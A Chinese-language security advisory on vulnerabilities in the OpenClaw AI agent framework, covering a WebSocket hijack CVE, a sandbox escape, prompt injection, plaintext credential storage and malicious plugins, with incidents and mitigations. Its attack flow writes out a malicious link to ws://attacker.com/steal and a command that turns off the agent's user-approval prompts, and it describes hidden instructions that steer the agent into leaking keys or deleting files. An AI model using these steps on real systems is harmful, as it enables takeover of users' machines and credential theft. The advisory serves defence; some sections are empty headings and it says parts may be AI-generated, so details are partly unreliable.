OpenClaw漏洞预警与分析

2026 年春天，一只 "龙虾" 在科技圈爆火 ——OpenClaw，这个被誉为 "增长最快的开源 AI Agent 项目"，在短短两个月内席卷全球，GitHub 狂揽 26 万星标，成为无数开发者和普通用户追捧的 AI 工具。然而，热潮之下隐藏着巨大的安全危机：近期多个高危漏洞被曝光，全球超过 27 万个 OpenClaw 实例暴露在公网，攻击者只需一个链接，就能完全控制用户设备。

一、

OpenClaw（曾用名 ClawdBot、Moltbot）是由奥地利知名开发者 Peter Steinberger（PSPDFKit 创始人）于 2025 年 11 月启动的开源 AI 智能体框架，采用 MIT 开源协议，可免费商用。它的核心定位是 "连接大模型与本地系统的执行中枢"—— 让 AI 从 "只会说话的嘴"，变成 "能办实事的手"。

与 ChatGPT、Claude 等传统对话 AI 不同，OpenClaw 不是一款单纯的聊天机器人，而是本地优先的 AI 代理平台。它能直接进驻你日常使用的通讯工具（飞书、钉钉、企业微信等），听懂自然语言指令后，真正动手执行任务：发邮件、整理文件、跑代码、爬数据、控制设备…… 实现从 "思考" 到 "行动" 的完整闭环。

OpenClaw 的核心架构由四大模块构成：

二、

漏洞等级：高危（CVSS 8.8）

影响版本：所有 2026.1.29 之前的版本

漏洞原理：OpenClaw 的 Gateway 服务默认绑定到0.0.0.0:18789，对所有网络接口开放。由于 WebSocket 握手阶段缺少 Origin 验证，攻击者可构造恶意网页，当用户浏览器访问该页面时，页面内嵌的 JavaScript 代码可在用户不知情的情况下建立 WebSocket 连接，劫持本地 Gateway，进而以当前用户权限执行任意操作。

攻击流程：

构造恶意链接：攻击者制作包含gatewayurl=ws://attacker.com/steal参数的恶意链接

诱导用户点击：通过钓鱼邮件、恶意网站、社交软件等方式传播

窃取认证 Token：用户点击后，OpenClaw 会自动连接到攻击者控制的端点，泄露浏览器中存储的网关身份验证令牌

突破安全限制：攻击者接入本地实例后，执行exec.approvals.set(ask:"off")关闭用户确认提示，修改配置突破 Docker 沙箱限制

远程代码执行：在突破所有安全限制后，攻击者可以执行任意 shell 命令，完全控制系统

漏洞等级：高危（CVSS 8.8）

影响版本：OpenClaw < 2026.2.14

漏洞原理：这是 CVE-2026-25253 的不完整修复版本，即使开启 Docker 隔离，攻击者也能通过特定的命令注入方式逃逸沙箱，直接在宿主机上执行命令。

漏洞等级：中危

漏洞原理：攻击者通过在网页、文档、邮件等内容中隐藏恶意自然语言指令，诱导 OpenClaw 读取该内容，可能导致其被诱导执行恶意操作，如泄露用户系统密钥、删除文件等。

漏洞等级：高危（CVSS 7.1）

漏洞原理：OpenClaw 将 OAuth 凭据、API 密钥等敏感信息以明文形式存储在 JSON 文件中，一旦攻击者获取该文件，就能直接获取所有敏感凭证。

漏洞等级：高危

漏洞原理：对 ClawHub 市场近 3000 个插件的扫描发现，已有 341 个被确认恶意，潜在风险插件超 472 个。恶意技能常伪装成 "加密货币追踪器"、"PDF 工具" 等热门应用，用户安装后即中招。

三、

四、

有用户因将 OpenClaw 的 VNC 服务暴露在公网，且浏览器保存了信用卡信息，导致信用卡被刷爆。攻击者通过未修改的默认密码轻松获得控制权，利用用户的支付信息进行盗刷。

深圳一名程序员安装 OpenClaw 第三天，API 密钥被盗。AI 在后台疯狂调用模型，用户在凌晨收到 1.2 万元 Token 账单时才发现异常。调查显示，恶意插件窃取了存储在配置文件中的密钥。

某科技公司使用 OpenClaw 处理内部文档，攻击者通过漏洞获取了公司的核心技术文档和客户数据，导致公司遭受重大损失。

五、

官方修复：OpenClaw 官方已在 24 小时内发布紧急修复版本，开发者和企业需立即采取行动：

升级至 OpenClaw 2026.2.25 及以上版本，该版本针对漏洞的三大设计缺陷进行了全面修复：

-- 启用localhost连接的严格防护

-- 新增速率限制（默认每秒最多 5 次密码尝试）

-- 设置密码失败锁定机制（连续 10 次失败，锁定 10 分钟）

-- 完善日志记录，便于后续溯源

-- 2026 年 2 月 15 日发布的 v2026.2.14 版本包含 50 余项安全强化修复

-- 2026 年 2 月 23 日发布的 v2026.2.23 版本进一步强化了安全防护

-- 2026 年 3 月 7 日发布的最新版本修复了 8 个中危漏洞

六、

如果暂时无法升级，可采取以下临时防护措施：

将 Gateway 服务的默认端口 18789 修改为其他端口

不要绑定到 [0.0.0.0](0.0.0.0)，仅绑定到localhost或特定 IP

在防火墙中限制对 OpenClaw 端口的访问

禁用 OpenClaw 的自动 WebSocket 连接功能

定期查看 OpenClaw 的日志文件，发现异常及时处理

七、

网络隔离：将 OpenClaw 部署在专用网络中，避免直接暴露在公网

权限控制：使用最低权限原则运行 OpenClaw，避免使用 root 权限

加密存储：对敏感配置文件进行加密存储，避免明文存储凭证

定期备份：定期备份 OpenClaw 的配置数据，防止数据丢失

官方渠道下载：仅从 ClawHub 官方市场下载插件，避免使用第三方来源

代码审查：对下载的插件进行代码审查，确保没有恶意代码

权限限制：为每个插件设置最小权限，避免插件获取过多系统权限

定期更新：及时更新插件，修复已知安全漏洞

不点击陌生链接：避免点击来源不明的链接，特别是包含 gatewayurl 参数的链接

修改默认密码：安装后立即修改 OpenClaw 的默认密码，使用强密码

关闭不必要功能：禁用不需要的功能和插件，减少攻击面

定期检查：定期检查 OpenClaw 的运行状态，发现异常及时处理

八、

OpenClaw 作为一款革命性的 AI 智能体工具，为我们带来了前所未有的效率提升，但同时也带来了新的安全挑战。在享受 AI 带来便利的同时，我们必须重视安全问题，及时修复漏洞，加强安全防护。

-- 所有 OpenClaw 用户请立即升级至最新版本

-- 检查自己的实例是否暴露在公网，及时采取防护措施

-- 定期检查系统日志，发现异常及时处理

-- 提高安全意识，避免点击陌生链接

安全无小事，特别是在 AI 时代，一个小小的漏洞可能会导致严重的后果。让我们一起守护好自己的数字安全，让 AI 真正为我们服务，而不是成为攻击者的工具。

OpenClaw 官方安全公告

CVE-2026-25253 漏洞详情

OpenClaw Exposure Watchboard 测绘数据

国内多家安全机构发布的安全预警

（注：文档部分内容可能由 AI 生成）